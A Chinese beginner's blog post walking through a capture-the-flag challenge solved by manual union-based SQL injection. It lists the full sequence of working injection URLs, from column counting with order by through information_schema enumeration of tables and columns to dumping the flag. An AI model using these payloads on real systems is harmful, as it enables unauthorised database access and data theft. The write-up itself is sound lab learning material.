这是本萌新第一次写博客,作为对前面的学习的总结。
如有错误,欢迎各位师傅们指正。
如何判断注入类型我就不做过多的解释,不知道同学请移步去学习(手动狗头)。
CTF中的SQL注入
我采用的是手注
根据经验判断是字符型注入。
接下来就来查看有几列,order by后面依次跟1,2,3,4…当到4时页面查询失败,说明有3列。
http://eci-2ze96pvo7epn5uc0i8pa.cloudeci1.ichunqiu.com/index.php?id=1' order by 3 %23
http://eci-2ze96pvo7epn5uc0i8pa.cloudeci1.ichunqiu.com/index.php?id=1' order by 4 %23
接下来就是查询数据库
我采用的是concat_ws()。
http://eci-2ze96pvo7epn5uc0i8pa.cloudeci1.ichunqiu.com/index.php?id=-1' union select NULL,concat_ws(":",version(),database(),user()),NULL %23
得到note,还是root用户。
其中note的16进制为0x6e6f7465.
接下来爆表名.`
http://eci-2ze96pvo7epn5uc0i8pa.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1, table_name ,3 from information_schema.tables where table_schema=0x6e6f7465 limit 0,1 %23
http://eci-2ze96pvo7epn5uc0i8pa.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1, table_name ,3 from information_schema.tables where table_schema=0x6e6f7465 limit 1,2 %23
得到fl4g(0x666c3467) ,notes
接下来查列名
http://eci-2ze96pvo7epn5uc0i8pa.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1, column_name,3 from information_schema.columns where table_schema=0x6e6f7465 and table_name=0x666c3467 limit 0,1 %23
得到fllllag,只查到1个列,有点迷,先不管…
,先去看看 里面是什么。
http://eci-2ze96pvo7epn5uc0i8pa.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1,2,fllllag from fl4g %23
得到flag
n1book{union_select_is_so_cool}